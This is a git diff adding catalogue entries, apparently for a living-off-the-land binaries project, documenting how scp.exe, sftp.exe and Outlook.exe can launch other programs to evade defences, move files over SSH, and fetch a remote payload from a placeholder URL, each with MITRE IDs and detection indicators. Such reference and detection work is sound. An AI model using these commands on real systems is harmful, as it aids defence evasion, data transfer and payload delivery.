diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml new file mode 100644 index 00000000..8a895a25 --- /dev/null +++ b/yml/OSBinaries/scp.yml @@ -0,0 +1,42 @@ +--- +Name: scp.exe +Description: Secure Copy Protocol +Author: Nir Chako +Created: 2022-11-14 +Commands: + - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' + Description: Execute notepad.exe with scp.exe as parent process + Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128: " + Description: Download file with scp.exe from an SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128:" + Description: Upload file with scp.exe to an SSH server + Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp " + Description: Copy file with scp.exe to a local path + Usecase: Use scp.exe to Copy a file from one location to another. + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\scp.exe +Detection: + - IOC: scp.exe spawning unexpected processes + - IOC: Suspicious SSH internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml new file mode 100644 index 00000000..22396c96 --- /dev/null +++ b/yml/OSBinaries/sftp.yml @@ -0,0 +1,20 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml @@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0'